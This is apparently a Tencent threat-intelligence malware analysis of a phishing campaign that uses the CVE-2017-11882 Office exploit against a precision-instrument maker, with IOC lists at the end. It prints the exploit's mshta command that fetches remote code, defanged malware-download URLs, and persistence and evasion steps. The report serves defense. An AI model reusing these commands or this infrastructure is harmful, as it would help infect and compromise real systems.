商贸信病毒针对某精密仪器公司的APT攻击

腾讯电脑管家

一、背景

近期腾讯安全御见威胁情报中监测到有黑客组织利用“商贸信”病毒针对外贸行业的APT攻击再次活跃。此轮攻击的特点为，利用2017年微软公布的office公式编辑器漏洞CVE-2017-11882构造钓鱼文档，文档触发漏洞后通过mshta.exe执行由短链接bit.ly构造的远程代码，从而将后门木马植入。

在某例攻击中，我们发现攻击者使用的钓鱼文档名称中包含某精密仪器公司的全称，并且将文档成功发送至该公司的邮箱中。该文档触发漏洞执行后会下载后门木马smbn.exe，木马释放AutoIt脚本执行器，然后将高度混淆的AutoIt脚本代码传入脚本执行器执行，并安装为启动项反复执行，木马具有检测虚拟机，禁止任务管理器启动，关闭UAC，注入恶意代码到系统进程执行等功能。

“商贸信”攻击流程图

二、详细分析

钓鱼邮件

被攻击某公司为生成电脑数值控制(CNC)，PCB成型机，PCB钻孔机等仪器，该公司与欧洲知名厂商合作生产，是一家全球化企业。

针对该公司攻击时的邮件附件名为：xx精密股份限公司_3Q_pdf.doc，可见黑客已经在攻击前搜集了该公司的详细信息。打开文档发现包含一张图片，标题为“commercial invoice”，是卖方开立的载有货物名称、数量、价格等内容的清单，作为买卖双方交接货物和结算货款的主要单证，是进口国确定征收进口关税的依据，也是买卖双方索赔、理赔的依据。

文档中包含精心构造的CVE-2017-11882漏洞触发代码，打开文档在未打补丁的电脑上会触发漏洞攻击执行命令mshta http[:]//bit.ly/2Y3jDhx &AAAAAAAAAAAAAAA

http[:]//bit.ly/2Y3jDhx为短链接，访问时会跳转到地址http[:]//vilamax.home.pl/x/bn.hta，bn.hta继续下载和执行后门木马smbn.exe(http[:]//nextserv.pl/av/smbn.exe)

smbn.exe

smbn.exe为自解压程序，运行后释放55个文件到%Temp%/08761141/目录下。其中最关键的文件有三个：lfw.exe为AutoIt脚本执行器，xql=njc为第一层脚本，phm.ppt为被加密的最终脚本。（AutoIt是一个使用类似BASIC脚本语言的免费软件，它设计用于Windows GUI(图形用户界面)中进行自动化操作，它利用模拟键盘按键，鼠标移动和窗口/控件的组合来实现自动化任务。）

解压时会通过命令行启动mvs.vbs，该脚本将 “xql=njc”文件作为参数传递给lfw.exe执行。

“xql=njc”文件被加入了大量杂质数据，因此有超过10M 大小，分析时发现里面包含真正执行的AutoIt脚本只有78行代码。

杂质中暗藏的AutoIt代码：

提取出AutoIt代码只有78行：

分析“xql=njc”中的脚本代码，发现其功能为从phm.ppt中按照一定的特征如“S3tting”、“Dir3ctory”、“sK”、“sN”、“sData”、“esData”等定位加密数据，将加密数据解密成新的AutoIt代码后，保存至当前目录下的五位随机字符组成的文件名中，然后通过Run命令执行该脚本文件。

定位加密数据

生成五位随机名字符文件，取ASCII编码65至90(对应大写字母A至Z)

将解密后的代码写入文件(随机文件名)并通过Run命令启动执行

核心脚本

解密出的随机名脚本文件共有754行代码，同样作为参数由脚本执行器lfw.exe执行，脚本实现虚拟机检测，安装启动项，解密PE数据，注入进程执行等核心功能，并且会在执行结束后被立即删除。

脚本文件位置

C:\Documents and Settings\[guid]\Local Settings\Temp\08761141\SVDDG

C:\Users\[guid]\AppData\Local\Temp\08761141\KUEHL

再次从phm.ppt中读取加密数据

写入注册表添加启动项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce

关闭UAC

检测虚拟机

将start.vbs添加到启动项，start.vbs执行start.cmd，start.cmd最后启动lfw.exe “xql=njc”

禁任务管理器进程启动

通过ShellExecute执行mshta.exe

执行run.vbs，该脚本同样用于启动lfw.exe “xql=njc”

将数据还原为PE结构

将恶意代码注入系统进程

连接C2地址smb3ans.pw

三、安全建议

1、不要打开不明来源的邮件附件，对于邮件附件中的文件要谨慎运行，如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描；

2、升级office系列软件到最新版本，不要随意运行不可信文档中的宏；

3、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击；

4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。

IOCs

a946caff9b3ae9aa8e8acf555564e296

f5210ee307e0b2c116bfa12b3d4a701c

678e4f45baf3f712988124a4142a50eb

96fc0ef4af7b2704194b9c04a04354a7

d22a2cd43e5b45bfc940e3fae9899548

b706d74aaede26a5b106b9ed836a33f9

7579a2ccca5100f4d669bd70916cabff

8d3cfd4833fe6e76b2ab81debad00ecb

6ee7ddebff0a2b78c7ac30f6e00d1d11

3a470a4ffb26904bae147c85c7686afb

邮箱：

jerryaccountant@yahoo.com

Domain

vilamax.home.pl

nextserv.pl

zaloparvari.ir

smb3ans.pw

URL

http[:]//bit.ly/2Y3jDhx

http[:]//bit.ly/2Sh9xDv

http[:]//bit.ly/2Gr1Tlf

http[:]//bit.ly/2Y2vDQy

http[:]//bit.ly/2SrN6f8

http[:]//bit.ly/2Gr1Tlf

http[:]//bit.ly/2YSVgQ1

http[:]//bit.ly/2Sg8m7n

http[:]//bit.ly/2Srp9Va

http[:]//vilamax.home.pl/x/bn.hta

http[:]//vilamax.home.pl/css/joibr.exe

http[:]//vilamax.home.pl/x/ny.hta

http[:]//vilamax.home.pl/a/klzb.pif

http[:]//vilamax.home.pl/css/k1tt.exe

http[:]//vilamax.home.pl/css/joyk.exe

http[:]//nextserv.pl/av/smbn.exe

http[:]//nextserv.pl/av/ktzb.exe

http[:]//nextserv.pl/av/jony.exe

http[:]//zaloparvari.ir/fries.hta

http[:]//zaloparvari.ir/freind.hta

http[:]//zaloparvari.ir/payment.doc

http[:]//zaloparvari.ir/RFQorder.doc

http[:]//netlux.in/img/bn.hta

http[:]//netlux.in/img/zb.hta

http[:]//netlux.in/img/my.hta

iha40999

只有想不到的，没有做不到的

kfne12

apt防不胜防啊